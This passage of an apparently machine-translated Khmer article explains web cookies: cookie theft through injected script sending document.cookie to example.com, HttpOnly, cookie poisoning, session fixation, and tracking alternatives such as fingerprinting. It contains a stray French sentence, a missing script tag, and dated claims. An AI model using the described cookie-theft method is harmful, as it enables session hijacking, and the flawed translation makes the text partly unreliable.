នៅពេលដែលអ្នកប្រើប្រាស់ផ្សេងទៀតចុចលើតំណនេះ កម្មវិធីរុករកតាមអ៊ីនធឺណិតនឹងដំណើរការផ្នែកគុណលក្ខណៈ onclick នៃកូដ ដូច្នេះវាជំនួសខ្សែអក្សរ document.cookie ជាមួយនឹងបញ្ជីនៃខូគីអ្នកប្រើប្រាស់ដែលសកម្មសម្រាប់ទំព័រនេះ។ ដូច្នេះ បញ្ជី cookies នេះត្រូវបានផ្ញើទៅកាន់ម៉ាស៊ីនមេ example.com ហើយអ្នកវាយប្រហារអាចប្រមូល cookies របស់អ្នកប្រើប្រាស់នេះ។

ប្រភេទនៃការវាយប្រហារនេះគឺពិបាកក្នុងការរកឃើញនៅខាងអ្នកប្រើប្រាស់ ដោយសារស្គ្រីបមកពីដែនដូចគ្នាដែលកំណត់ខូគី ហើយប្រតិបត្តិការដើម្បីផ្ញើតម្លៃហាក់ដូចជាត្រូវបានអនុញ្ញាតដោយដែននោះ។ វាត្រូវបានចាត់ទុកថាវាជាទំនួលខុសត្រូវរបស់អ្នកគ្រប់គ្រងដែលប្រតិបត្តិការគេហទំព័រប្រភេទនេះក្នុងការដាក់កម្រិតទប់ស្កាត់ការបោះពុម្ពផ្សាយកូដព្យាបាទ។

ខូគីមិនអាចមើលឃើញដោយផ្ទាល់ចំពោះកម្មវិធីភាគីអតិថិជនដូចជា JavaScript ប្រសិនបើពួកគេត្រូវបានផ្ញើដោយទង់ HttpOnly។ តាមទស្សនៈរបស់ម៉ាស៊ីនមេ ភាពខុសគ្នាតែមួយគត់គឺថានៅក្នុងបន្ទាត់នៃបឋមកថា Set-Cookie ត្រូវបានបន្ថែមវាលថ្មីមួយដែលមានខ្សែអក្សរ HttpOnly៖

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

នៅពេលដែលកម្មវិធីរុករកទទួលបានខូគីបែបនេះ វាត្រូវបានសន្មត់ថាប្រើវាជាធម្មតានៅក្នុងការផ្លាស់ប្តូរ HTTP ខាងក្រោម ប៉ុន្តែដោយមិនធ្វើឱ្យវាអាចមើលឃើញដោយស្គ្រីបដែលបានប្រតិបត្តិនៅផ្នែកខាងអតិថិជន។ ទង់ HttpOnly មិនមែនជាផ្នែកនៃលក្ខណៈបច្ចេកទេសផ្លូវការណាមួយឡើយ ហើយមិនត្រូវបានអនុវត្តនៅក្នុងកម្មវិធីរុករកទាំងអស់ទេ។ ចំណាំថាបច្ចុប្បន្នមិនមានវិធីដើម្បីទប់ស្កាត់ការអាន និងសរសេរខូគីសម័យដោយវិធីសាស្ត្រ XMLHTTPRequest ទេ។

ការកែប្រែខ្លឹមសារ៖ អ្នកវាយប្រហារផ្ញើខូគីមិនត្រឹមត្រូវទៅម៉ាស៊ីនមេ ដែលអាចធ្វើទៅបានពីខូគីត្រឹមត្រូវដែលផ្ញើដោយម៉ាស៊ីនមេ។

ការផ្លាស់ប្តូរខូគី

ដរាបណាខូឃីត្រូវរក្សាទុក ហើយត្រឡប់មិនផ្លាស់ប្តូរទៅម៉ាស៊ីនមេ អ្នកវាយប្រហារអាចកែប្រែតម្លៃនៃខូគី មុនពេលពួកវាត្រូវបានបញ្ជូនត្រឡប់ទៅម៉ាស៊ីនមេវិញ។ ឧទាហរណ៍ ប្រសិនបើខូគីមានតម្លៃសរុបដែលអ្នកប្រើប្រាស់ត្រូវចំណាយសម្រាប់របស់របរដែលដាក់ក្នុងរទេះទិញទំនិញរបស់ហាង ការផ្លាស់ប្តូរតម្លៃនេះធ្វើឱ្យម៉ាស៊ីនមេមានហានិភ័យនៃការគិតថ្លៃអ្នកវាយប្រហារតិចជាងតម្លៃចាប់ផ្តើម។ ដំណើរការនៃការកែប្រែតម្លៃនៃខូគីត្រូវបានគេហៅថា ការពុលខូឃី និងអាចត្រូវបានប្រើបន្ទាប់ពីការលួច cookie ដើម្បីធ្វើឱ្យការវាយប្រហារនៅតែបន្ត។

នៅក្នុងវិធីសាស្ត្របដិសេធខូគី អ្នកវាយប្រហារទាញយកកំហុសរបស់កម្មវិធីរុករកតាមអ៊ីនធឺណិត ដើម្បីផ្ញើខូគីមិនត្រឹមត្រូវទៅម៉ាស៊ីនមេ។

ទោះយ៉ាងណាក៏ដោយ គេហទំព័រភាគច្រើន រក្សាទុកតែលេខសម្គាល់សម័យប៉ុណ្ណោះ ដែលជាលេខពិសេសដែលបង្កើតដោយចៃដន្យ ដែលប្រើដើម្បីកំណត់អត្តសញ្ញាណអ្នកប្រើប្រាស់សម័យ - នៅក្នុងខូគីខ្លួនឯង ខណៈដែលព័ត៌មានផ្សេងទៀតទាំងអស់ត្រូវបានរក្សាទុកនៅលើម៉ាស៊ីនមេ។ ក្នុងករណីនេះបញ្ហានេះត្រូវបានដោះស្រាយយ៉ាងទូលំទូលាយ។

ការគ្រប់គ្រងខូគីរវាងគេហទំព័រ

គេហទំព័រនីមួយៗត្រូវបានគេរំពឹងថានឹងមានខូគីផ្ទាល់ខ្លួន ដូច្នេះគេហទំព័រមួយមិនគួរអាចកែប្រែ ឬបង្កើតខូគីដែលពាក់ព័ន្ធជាមួយគេហទំព័រមួយផ្សេងទៀតបានទេ។ កំហុសសុវត្ថិភាពរបស់កម្មវិធីរុករកតាមអ៊ីនធឺណិតអាចអនុញ្ញាតឱ្យគេហទំព័រព្យាបាទបំពានច្បាប់នេះ។ ការកេងប្រវ័ញ្ចនៃកំហុសបែបនេះត្រូវបានសំដៅជាទូទៅថាជា ចម្អិនអាហារឆ្លងកាត់កន្លែង. គោលបំណងនៃការវាយប្រហារបែបនេះអាចជាការលួចលេខសម្គាល់សម័យ។

អ្នកប្រើប្រាស់គួរតែប្រើកំណែចុងក្រោយបំផុតនៃកម្មវិធីរុករកតាមអ៊ីនធឺណិត ដែលភាពងាយរងគ្រោះទាំងនេះត្រូវបានលុបចោលស្ទើរតែទាំងស្រុង។

ស្ថានភាពជម្លោះរវាងម៉ាស៊ីនភ្ញៀវ និងម៉ាស៊ីនមេ

ការប្រើប្រាស់ខូគីអាចបង្កើតភាពផ្ទុយគ្នារវាងស្ថានភាពរបស់អតិថិជន និងរដ្ឋដែលរក្សាទុកក្នុងខូគី។ ប្រសិនបើអ្នកប្រើទទួលបានខូគី ហើយចុចលើប៊ូតុង "ថយក្រោយ" នៃកម្មវិធីរុករកតាមអ៊ីនធឺណិត ស្ថានភាពនៃកម្មវិធីរុករកជាទូទៅមិនដូចមុននឹងការទិញនេះទេ។ ឧទាហរណ៍ ប្រសិនបើកញ្ចប់នៃហាងអនឡាញត្រូវបានបង្កើតដោយប្រើខូឃី មាតិកានៃកញ្ចប់មិនអាចផ្លាស់ប្តូរបានទេនៅពេលដែលអ្នកប្រើត្រឡប់ទៅប្រវត្តិកម្មវិធីរុករកវិញ៖ ប្រសិនបើអ្នកប្រើចុចប៊ូតុងដើម្បីបន្ថែមអត្ថបទនៅក្នុងកញ្ចប់របស់គាត់ ហើយចុចលើ "ត្រឡប់ ប៊ូតុង " អត្ថបទនៅតែមាននៅក្នុងមួយនេះ។ នេះប្រហែលជាមិនមែនជាចេតនារបស់អ្នកប្រើប្រាស់ទេ ដែលប្រាកដជាចង់លុបចោលការបន្ថែមអត្ថបទនេះ។ នេះអាចនាំឱ្យមានភាពមិនគួរឱ្យទុកចិត្ត ការភាន់ច្រឡំ និងកំហុស។ ដូច្នេះអ្នកបង្កើតគេហទំព័រគួរតែដឹងពីបញ្ហានេះ និងអនុវត្តវិធានការដើម្បីដោះស្រាយស្ថានភាពបែបនេះ។

ខូឃីផុតកំណត់

ខូគីជាប់លាប់ត្រូវបានរិះគន់ដោយអ្នកជំនាញសុវត្ថិភាពឯកជនភាពថាមិនត្រូវបានកំណត់ឱ្យផុតកំណត់ក្នុងពេលឆាប់ៗនេះទេ ដោយហេតុនេះអនុញ្ញាតឱ្យគេហទំព័រតាមដានអ្នកប្រើប្រាស់ និងបង្កើតទម្រង់របស់ពួកគេតាមពេលវេលា។ ទិដ្ឋភាពនៃខូគីនេះក៏ជាផ្នែកនៃបញ្ហាលួចចូលសម័យដែរ ពីព្រោះខូគីជាប់លាប់ដែលត្រូវគេលួចអាចប្រើដើម្បីក្លែងធ្វើជាអ្នកប្រើប្រាស់ក្នុងរយៈពេលដ៏ច្រើនសន្ធឹកសន្ធាប់។

ដើម្បីអានផងដែរ: GAFAM៖ តើពួកគេជានរណា? ហេតុអ្វីបានជាពួកគេ (ពេលខ្លះ) គួរឱ្យខ្លាចដូច្នេះ?

ជម្មើសជំនួសសម្រាប់ខូគី

ប្រតិបត្តិការមួយចំនួនដែលអាចត្រូវបានអនុវត្តដោយប្រើខូគីក៏អាចត្រូវបានអនុវត្តដោយប្រើយន្តការផ្សេងទៀតដែលឆ្លងកាត់ខូគី ឬបង្កើតខូគីដែលបានលុបឡើងវិញ ដែលបង្កើតបញ្ហាឯកជនភាពតាមរបៀបដូចគ្នា (ឬពេលខ្លះកាន់តែអាក្រក់ព្រោះមើលមិនឃើញ) ជាងខូគី។

អាសយដ្ឋាន IP

អ្នក​ប្រើ​អាច​ត្រូវ​បាន​តាម​ដាន​ជាមួយ​នឹង​អាសយដ្ឋាន IP របស់​កុំព្យូទ័រ​ដែល​ហៅ​ទំព័រ។ បច្ចេកទេសនេះអាចប្រើបានតាំងពីការណែនាំរបស់វើលវ៉ាយវ៉េប ដោយសារទំព័រត្រូវបានទាញយក សឺវើរស្នើសុំអាសយដ្ឋាន IP របស់កុំព្យូទ័រដែលដំណើរការកម្មវិធីរុករកតាមអ៊ីនធឺណិត ឬប្រូកស៊ី ប្រសិនបើគ្មានការប្រើប្រាស់។ ម៉ាស៊ីនមេអាចតាមដានព័ត៌មាននេះថាតើមានខូឃីកំពុងប្រើប្រាស់ឬអត់។ ទោះជាយ៉ាងណាក៏ដោយ អាសយដ្ឋានទាំងនេះជាធម្មតាមិនសូវជឿជាក់ក្នុងការកំណត់អត្តសញ្ញាណអ្នកប្រើប្រាស់ជាងខូគី ពីព្រោះកុំព្យូទ័រ និងប្រូកស៊ីអាចត្រូវបានចែករំលែកដោយអ្នកប្រើប្រាស់ច្រើន ហើយកុំព្យូទ័រដូចគ្នាអាចទទួលបានអាសយដ្ឋាន IP ផ្សេងគ្នានៅលើវគ្គការងារនីមួយៗ (ដូចជា c ជាញឹកញាប់ករណីសម្រាប់ការតភ្ជាប់ទូរស័ព្ទ) .

ការតាមដានដោយអាសយដ្ឋាន IP អាចទុកចិត្តបានក្នុងស្ថានភាពមួយចំនួន ដូចជាការតភ្ជាប់អ៊ីនធឺណិតដែលរក្សាអាសយដ្ឋាន IP ដូចគ្នាក្នុងរយៈពេលយូរ ដរាបណាថាមពលបើក។

ប្រព័ន្ធមួយចំនួនដូចជា Tor ត្រូវបានរចនាឡើងដើម្បីរក្សាអនាមិកនៃអ៊ីនធឺណិត និងធ្វើឱ្យការតាមដានដោយអាសយដ្ឋាន IP មិនអាចទៅរួច ឬមិនអាចអនុវត្តបាន។

URL

បច្ចេកទេសច្បាស់លាស់ជាងនេះគឺផ្អែកលើការបង្កប់ព័ត៌មាននៅក្នុង URLs ។ ផ្នែកខ្សែអក្សរសំណួរនៃ URL គឺជាបច្ចេកទេសមួយដែលជាធម្មតាត្រូវបានប្រើប្រាស់សម្រាប់គោលបំណងនេះ ប៉ុន្តែផ្នែកផ្សេងទៀតអាចត្រូវបានប្រើផងដែរ។ ទាំង Java serverlet និងយន្តការសម័យ PHP ប្រើវិធីនេះ ប្រសិនបើ cookies មិនត្រូវបានបើក។

វិធីសាស្រ្តនេះពាក់ព័ន្ធនឹងម៉ាស៊ីនមេបណ្តាញបន្ថែមការស្នើសុំខ្សែអក្សរទៅកាន់តំណភ្ជាប់នៃគេហទំព័រដែលផ្ទុកវានៅពេលវាត្រូវបានផ្ញើទៅកម្មវិធីរុករក។ នៅពេលអ្នកប្រើប្រាស់ធ្វើតាមតំណ កម្មវិធីរុករកនឹងបញ្ជូនខ្សែអក្សរសំណួរដែលបានភ្ជាប់ទៅម៉ាស៊ីនមេ។

ខ្សែអក្សរសំណួរដែលប្រើសម្រាប់គោលបំណងនេះ និងខូគីគឺស្រដៀងគ្នាខ្លាំងណាស់ ទាំងព័ត៌មានដែលត្រូវបានជ្រើសរើសដោយម៉ាស៊ីនមេ និងបញ្ជូនមកវិញដោយកម្មវិធីរុករក។ ទោះយ៉ាងណាក៏ដោយ មានភាពខុសប្លែកគ្នាមួយចំនួន៖ នៅពេលដែល URL ដែលមានខ្សែអក្សរសំណួរត្រូវបានប្រើប្រាស់ឡើងវិញ ព័ត៌មានដូចគ្នាត្រូវបានផ្ញើទៅម៉ាស៊ីនមេ។ ឧទាហរណ៍ ប្រសិនបើចំណូលចិត្តរបស់អ្នកប្រើត្រូវបានអ៊ិនកូដនៅក្នុងខ្សែអក្សរសំណួរនៃ URL ហើយអ្នកប្រើប្រាស់ផ្ញើ URL នោះទៅអ្នកប្រើប្រាស់ផ្សេងទៀតតាមរយៈអ៊ីមែល អ្នកប្រើប្រាស់នោះក៏នឹងអាចប្រើប្រាស់ចំណូលចិត្តទាំងនោះផងដែរ។

ម្យ៉ាងវិញទៀត នៅពេលដែលអ្នកប្រើប្រាស់ចូលទៅកាន់ទំព័រដូចគ្នាពីរដង វាមិនមានការធានាថា ខ្សែអក្សរសំណួរដូចគ្នានឹងត្រូវប្រើទាំងពីរដងនោះទេ។ ឧទាហរណ៍ ប្រសិនបើអ្នកប្រើចូលទំព័រពីទំព័រគេហទំព័រខាងក្នុងជាលើកដំបូង ហើយចុះចតនៅលើទំព័រដូចគ្នាពីទំព័រខាងក្រៅជាលើកទីពីរ ខ្សែអក្សរសំណួរទាក់ទងនឹងទំព័រគេហទំព័រជាធម្មតាខុសគ្នា ខណៈពេលដែលខូគីគឺដូចគ្នា .

គុណវិបត្តិផ្សេងទៀតនៃខ្សែអក្សរសំណួរគឺទាក់ទងទៅនឹងសុវត្ថិភាព៖ ការរក្សាទិន្នន័យដែលកំណត់អត្តសញ្ញាណសម័យនៅក្នុងខ្សែអក្សរសំណួរអាចបើក ឬសម្រួលដល់ការវាយប្រហារនៃការកំណត់វគ្គ ការវាយប្រហារតាមការកំណត់អត្តសញ្ញាណ និងការកេងប្រវ័ញ្ចផ្សេងទៀត។ ការឆ្លងកាត់លេខសម្គាល់សម័យជាខូគី HTTP គឺមានសុវត្ថិភាពជាង។

វាលទម្រង់ដែលលាក់

ទម្រង់មួយនៃការតាមដានសម័យ ដែលប្រើដោយ ASP.NET គឺត្រូវប្រើទម្រង់គេហទំព័រដែលមានវាលលាក់។ បច្ចេកទេសនេះគឺស្រដៀងទៅនឹងការប្រើខ្សែអក្សរសំណួរ URL ដើម្បីយកព័ត៌មាន និងមានគុណសម្បត្តិ និងគុណវិបត្តិដូចគ្នា ហើយប្រសិនបើទម្រង់ត្រូវបានដំណើរការដោយវិធីសាស្ត្រ HTTP GET នោះវាលពិតជាក្លាយជាផ្នែកមួយនៃ URL របស់កម្មវិធីរុករកតាមអ៊ីនធឺណិតដែលនឹងផ្ញើវានៅពេលបញ្ជូនទម្រង់។ ប៉ុន្តែទម្រង់ភាគច្រើនត្រូវបានដំណើរការជាមួយ HTTP POST ដែលបណ្តាលឱ្យព័ត៌មានទម្រង់ រួមទាំងវាលដែលលាក់ត្រូវបានបន្ថែមជាការបញ្ចូលបន្ថែមដែលមិនមែនជាផ្នែកនៃ URL ឬខូគី។

វិធីសាស្រ្តនេះមានគុណសម្បត្តិពីរពីទស្សនៈតាមដាន៖ ទីមួយការតាមដានព័ត៌មានដែលដាក់ក្នុងកូដប្រភព HTML និង POST បញ្ចូលជាជាង URL នឹងអនុញ្ញាតឱ្យអ្នកប្រើជាមធ្យមជៀសវាងការតាមដាននេះ។ ទីពីរ ព័ត៌មានសម័យមិនត្រូវបានចម្លងទេ នៅពេលដែលអ្នកប្រើប្រាស់ចម្លង URL (ដើម្បីរក្សាទុកទំព័រទៅក្នុងថាស ឬផ្ញើវាតាមរយៈអ៊ីមែល ជាឧទាហរណ៍)។

ឈ្មោះ window

កម្មវិធីរុករកតាមអ៊ីនធឺណិតទូទៅទាំងអស់អាចផ្ទុកទិន្នន័យយ៉ាងច្រើន (ពី 2MB ទៅ 32MB) តាមរយៈ JavaScript ដោយប្រើលក្ខណសម្បត្តិ window.name របស់ DOM ។ ទិន្នន័យនេះអាចត្រូវបានប្រើជំនួសឱ្យខូគីសម័យ ហើយក៏ត្រូវបានប្រើប្រាស់ទូទាំងដែនផងដែរ។ បច្ចេកទេសនេះអាចត្រូវបានផ្សំជាមួយវត្ថុ JSON ដើម្បីរក្សាទុកសំណុំស្មុគស្មាញនៃអថេរសម័យរបស់អតិថិជន។

គុណវិបត្តិគឺថា បង្អួច ឬផ្ទាំងនីមួយៗដំបូងនឹងមាន window.name ទទេ។ នៅពេលរុករកតាមផ្ទាំង (បើកដោយអ្នកប្រើប្រាស់) នេះមានន័យថាផ្ទាំងដែលបានបើកជាលក្ខណៈបុគ្គលនឹងមិនមានឈ្មោះបង្អួចទេ។ លើសពីនេះ window.name អាចត្រូវបានប្រើដើម្បីតាមដានអ្នកទស្សនានៅទូទាំងគេហទំព័រផ្សេងៗគ្នាដែលអាចបង្កឱ្យមានការព្រួយបារម្ភអំពីឯកជនភាព។

នៅក្នុងទិដ្ឋភាពមួយចំនួន វាអាចមានសុវត្ថិភាពជាងខូគី ដោយសារតែមិនមានការពាក់ព័ន្ធរបស់ម៉ាស៊ីនមេ ដូច្នេះហើយធ្វើឱ្យវាងាយរងគ្រោះទៅនឹងការវាយប្រហារបណ្តាញនៃខូគី sniffer ។ ទោះជាយ៉ាងណាក៏ដោយ ប្រសិនបើវិធានការពិសេសត្រូវបានចាត់វិធានការដើម្បីការពារទិន្នន័យ នោះវាងាយរងការវាយប្រហារបន្ថែមទៀត ដោយសារទិន្នន័យមានតាមរយៈគេហទំព័រផ្សេងទៀតដែលបានបើកនៅក្នុងបង្អួចតែមួយ។

ការផ្ទៀងផ្ទាត់ HTTP

ពិធីការ HTTP រួមបញ្ចូលពិធីការផ្ទៀងផ្ទាត់សិទ្ធិចូលដំណើរការជាមូលដ្ឋាន និងការវិភាគការផ្ទៀងផ្ទាត់សិទ្ធិចូលដំណើរការ ដែលអនុញ្ញាតឱ្យចូលប្រើគេហទំព័រមួយបានលុះត្រាតែអ្នកប្រើប្រាស់បានផ្តល់ឈ្មោះអ្នកប្រើប្រាស់ និងពាក្យសម្ងាត់តែប៉ុណ្ណោះ។ ប្រសិនបើម៉ាស៊ីនមេស្នើសុំវិញ្ញាបនបត្រដើម្បីផ្តល់សិទ្ធិចូលប្រើគេហទំព័រ កម្មវិធីរុករកតាមអ៊ីនធឺណិតស្នើសុំវាពីអ្នកប្រើប្រាស់ ហើយនៅពេលដែលទទួលបាន កម្មវិធីរុករកតាមអ៊ីនធឺណិតរក្សាទុកវា ហើយផ្ញើវាទៅក្នុងសំណើ HTTP ជាបន្តបន្ទាប់ទាំងអស់។ ព័ត៌មាននេះអាចត្រូវបានប្រើដើម្បីតាមដានអ្នកប្រើប្រាស់។

វត្ថុចែករំលែកក្នុងស្រុក

ប្រសិនបើកម្មវិធីរុករករួមបញ្ចូលកម្មវិធីជំនួយ Adobe Flash Player វត្ថុចែករំលែកក្នុងស្រុក អាចត្រូវបានប្រើសម្រាប់គោលបំណងដូចគ្នានឹងខូឃី។ ពួកគេអាចជាជម្រើសដ៏ទាក់ទាញសម្រាប់អ្នកបង្កើតគេហទំព័រ ពីព្រោះ៖

• ដែនកំណត់ទំហំលំនាំដើមសម្រាប់វត្ថុដែលបានចែករំលែកក្នុងតំបន់គឺ 100 KB;
• ការត្រួតពិនិត្យសុវត្ថិភាពគឺដាច់ដោយឡែកពីការត្រួតពិនិត្យខូគីរបស់អ្នកប្រើប្រាស់ (ដូច្នេះវត្ថុដែលបានចែករំលែកក្នុងតំបន់អាចត្រូវបានអនុញ្ញាតនៅពេលដែលខូគីមិនមាន)។

ចំណុចចុងក្រោយនេះ ដែលបែងចែកគោលការណ៍គ្រប់គ្រងខូគីពីវត្ថុដែលបានចែករំលែកក្នុងតំបន់របស់ Adobe លើក​សំណួរ ទាក់ទងនឹងការគ្រប់គ្រងដោយអ្នកប្រើប្រាស់នៃការកំណត់ឯកជនភាពរបស់គាត់៖ គាត់ត្រូវតែដឹងថាការគ្រប់គ្រងខូគីរបស់គាត់មិនមានផលប៉ះពាល់ដល់ការគ្រប់គ្រងវត្ថុដែលបានចែករំលែកក្នុងតំបន់ទេ ហើយផ្ទុយទៅវិញ។

ការរិះគន់មួយទៀតនៃប្រព័ន្ធនេះគឺថាវាអាចប្រើបានតែតាមរយៈកម្មវិធីជំនួយ Adobe Flash Player ដែលជាកម្មសិទ្ធិ និងមិនមែនជាស្តង់ដារគេហទំព័រ។

ការអត់ធ្មត់ខាងអតិថិជន

កម្មវិធីរុករកតាមអ៊ីនធឺណិតមួយចំនួនគាំទ្រយន្តការតស៊ូផ្អែកលើស្គ្រីប ដែលអនុញ្ញាតឱ្យទំព័ររក្សាទុកព័ត៌មានក្នុងមូលដ្ឋានសម្រាប់ប្រើប្រាស់នៅពេលក្រោយ។ ឧទាហរណ៍ Internet Explorer គាំទ្រព័ត៌មានជាប់លាប់ក្នុងប្រវត្តិកម្មវិធីរុករកតាមអ៊ីនធឺណិត ចំណាំក្នុងទម្រង់ដែលរក្សាទុកក្នុង XML ឬដោយផ្ទាល់ជាមួយគេហទំព័រដែលបានរក្សាទុកក្នុងថាស។ សម្រាប់ Microsoft Internet Explorer 5 មានវិធីសាស្រ្តទិន្នន័យអ្នកប្រើប្រាស់ដែលមានតាមរយៈឥរិយាបថ DHTML ។

W3C បានណែនាំនៅក្នុង HTML 5 នូវ JavaScript API ថ្មីសម្រាប់ការផ្ទុកទិន្នន័យផ្នែកខាងអតិថិជនដែលហៅថា ការផ្ទុកគេហទំព័រ ហើយមានគោលបំណងជំនួសខូគីជាអចិន្ត្រៃយ៍។ វាស្រដៀងទៅនឹងខូគី ប៉ុន្តែជាមួយនឹងសមត្ថភាពប្រសើរឡើងយ៉ាងខ្លាំង និងដោយគ្មានការរក្សាទុកព័ត៌មាននៅក្នុងបឋមកថានៃសំណើ HTTP ។ API អនុញ្ញាតឱ្យផ្ទុកគេហទំព័រពីរប្រភេទ៖ localstorage និង sessionstorage ស្រដៀងនឹង cookies ជាប់លាប់ និង session cookies (លើកលែងតែ session cookies ផុតកំណត់នៅពេលដែល browser ត្រូវបានបិទខណៈពេលដែល ការផ្ទុកវគ្គ ផុតកំណត់នៅពេលដែលផ្ទាំងត្រូវបានបិទ) រៀងគ្នា។ ការផ្ទុកគេហទំព័រត្រូវបានគាំទ្រដោយ Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 និង Opera 10.50 ។

យន្តការផ្សេងគ្នាជាធម្មតាពឹងផ្អែកលើឃ្លាំងសម្ងាត់កម្មវិធីរុករក (នៅក្នុងអង្គចងចាំជាជាងការធ្វើឱ្យស្រស់) ដោយប្រើកម្មវិធី JavaScript នៅក្នុងគេហទំព័រ។ 

ឧទាហរណ៍ ទំព័រមួយអាចមានស្លាក . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

នៅពេលនេះ កម្មវិធីនៅតែមាននៅក្នុងអង្គចងចាំឃ្លាំងសម្ងាត់ ហើយទំព័រដែលបានចូលមើលមិនត្រូវបានផ្ទុកឡើងវិញជាលើកទីពីរទេ។ អាស្រ័យហេតុនេះ ប្រសិនបើកម្មវិធីមានអថេរសកល (ឧទាហរណ៍ var id = 3243242;) ការកំណត់អត្តសញ្ញាណនេះនៅតែមានសុពលភាព ហើយអាចត្រូវបានទាញយកដោយកូដ JavaScript ផ្សេងទៀតនៅពេលដែលទំព័រត្រូវបានផ្ទុកម្តងទៀត ឬនៅពេលដែលទំព័រដែលភ្ជាប់កម្មវិធីត្រូវបានផ្ទុក។ 

គុណវិបត្តិចម្បងនៃវិធីសាស្ត្រនេះគឺថា អថេរសកល JavaScript ត្រូវតែឋិតិវន្ត មានន័យថាវាមិនអាចផ្លាស់ប្តូរ ឬលុបបានដូចជាខូគី។

ស្នាមម្រាមដៃកម្មវិធីរុករកបណ្ដាញ

ស្នាមម្រាមដៃរបស់កម្មវិធីរុករកគឺជាព័ត៌មានដែលប្រមូលបានអំពីការកំណត់រចនាសម្ព័ន្ធនៃកម្មវិធីរុករកតាមអ៊ីនធឺណិតសម្រាប់គោលបំណងកំណត់អត្តសញ្ញាណ។ ស្នាមម្រាមដៃទាំងនេះអាចត្រូវបានប្រើដើម្បីកំណត់អត្តសញ្ញាណអ្នកប្រើប្រាស់អ៊ីនធឺណេត ឬឧបករណ៍មួយយ៉ាងពេញលេញ ឬដោយផ្នែក បើទោះបីជាខូគីត្រូវបានបិទក៏ដោយ។

ព័ត៌មានអំពីការកំណត់រចនាសម្ព័ន្ធកម្មវិធីរុករកតាមអ៊ីនធឺណិតជាមូលដ្ឋានត្រូវបានប្រមូលជាយូរមកហើយដោយសេវាកម្មទស្សនិកជនគេហទំព័រសម្រាប់គោលបំណងវាស់ស្ទង់ចរាចរណ៍គេហទំព័ររបស់មនុស្សឱ្យបានត្រឹមត្រូវ និងស្វែងរកទម្រង់ផ្សេងៗនៃការក្លែងបន្លំចុច។ ដោយមានជំនួយពីភាសាស្គ្រីបខាងអតិថិជន ការប្រមូលព័ត៌មានត្រឹមត្រូវជាងនេះគឺមាន ឥឡូវនេះអាចធ្វើទៅបាន.

ការបំប្លែងព័ត៌មាននេះទៅជាខ្សែអក្សរប៊ីតបង្កើតស្នាមម្រាមដៃឧបករណ៍។ នៅក្នុងឆ្នាំ 2010 មូលនិធិ Electronic Frontier Foundation (EFF) បានវាស់ស្ទង់នូវ entropy នៃ fingerprint របស់ browser យ៉ាងហោចណាស់។ ប៊ីត 18,1ហើយនោះគឺមុនពេលការជឿនលឿនក្នុងការបោះពុម្ពស្នាមម្រាមដៃលើផ្ទាំងក្រណាត់បានបន្ថែម 5,7 ប៊ីតទៅ entropy នោះ។

ខូឃីនៅក្នុងសង្ខេប

ខូគីគឺជាឯកសារអត្ថបទតូចៗដែលផ្ទុកដោយកម្មវិធីរុករកតាមអ៊ីនធឺណិតនៅលើថាសរឹងរបស់អ្នកចូលមើលគេហទំព័រ ហើយដែលត្រូវបានប្រើ (ក្នុងចំណោមរបស់ផ្សេងទៀត) ដើម្បីកត់ត្រាព័ត៌មានអំពីអ្នកទស្សនា ឬការធ្វើដំណើររបស់ពួកគេតាមរយៈគេហទំព័រ។ ដូច្នេះអ្នកគ្រប់គ្រងគេហទំព័រអាចទទួលស្គាល់ទម្លាប់របស់អ្នកទស្សនា និងធ្វើបទបង្ហាញនៃគេហទំព័ររបស់គាត់សម្រាប់អ្នកទស្សនាម្នាក់ៗ។ ខូគី បន្ទាប់មកធ្វើឱ្យវាអាចចងចាំថាតើអត្ថបទប៉ុន្មានដែលត្រូវបង្ហាញនៅលើទំព័រដើម ឬសូម្បីតែរក្សាទុកព័ត៌មានសម្ងាត់សម្រាប់ការចូលសម្រាប់ភាគីឯកជនណាមួយ៖ នៅពេលដែលអ្នកចូលមើលត្រឡប់ទៅគេហទំព័រវិញ វាមិនចាំបាច់សម្រាប់គាត់ក្នុងការវាយបញ្ចូលឈ្មោះ និងពាក្យសម្ងាត់របស់គាត់ទៅ ត្រូវបានទទួលស្គាល់ ដោយសារពួកវាត្រូវបានអានដោយស្វ័យប្រវត្តិនៅក្នុងខូគី។

ខូគីមានអាយុកាលកំណត់ ដែលកំណត់ដោយអ្នករចនាគេហទំព័រ។ ពួកគេក៏អាចផុតកំណត់នៅចុងបញ្ចប់នៃវគ្គនៅលើគេហទំព័រ ដែលត្រូវនឹងការបិទកម្មវិធីរុករក។ ខូគី​ត្រូវ​បាន​គេ​ប្រើ​យ៉ាង​ទូលំទូលាយ​ដើម្បី​ធ្វើ​ឱ្យ​ជីវិត​កាន់​តែ​ងាយ​ស្រួល​សម្រាប់​អ្នក​ចូល​ទស្សនា ហើយ​បង្ហាញ​ព័ត៌មាន​ដែល​ពាក់ព័ន្ធ​បន្ថែម​ទៀត។ ប៉ុន្តែបច្ចេកទេសពិសេសធ្វើឱ្យវាអាចធ្វើទៅបានដើម្បីតាមដានអ្នកទស្សនានៅលើគេហទំព័រជាច្រើន ហើយដូច្នេះដើម្បីប្រមូល និងពិនិត្យព័ត៌មានយ៉ាងទូលំទូលាយអំពីទម្លាប់របស់គាត់។ វិធីសាស្រ្តនេះបានផ្តល់ឱ្យការប្រើប្រាស់ខូគីមានកេរ្តិ៍ឈ្មោះជាបច្ចេកទេសតាមដានដែលបំពានលើភាពឯកជនរបស់អ្នកទស្សនា ដែលជាអកុសលត្រូវគ្នាទៅនឹងការពិតនៅក្នុងករណីជាច្រើននៃការប្រើប្រាស់សម្រាប់ហេតុផលដែលមិនមែនជាបច្ចេកទេស ឬមិនគោរពតាមការរំពឹងទុករបស់អ្នកប្រើប្រាស់។

ដើម្បីឆ្លើយតបទៅនឹងការភ័យខ្លាចស្របច្បាប់ទាំងនេះ HTML 5 ណែនាំ JavaScript API ថ្មីសម្រាប់ការផ្ទុកទិន្នន័យផ្នែកខាងអតិថិជនដែលហៅថាការផ្ទុកគេហទំព័រ ដែលមានសុវត្ថិភាពជាង និងមានសមត្ថភាពកាន់តែច្រើន ដែលមានបំណងជំនួសខូគី។

ការផ្ទុកខូឃី

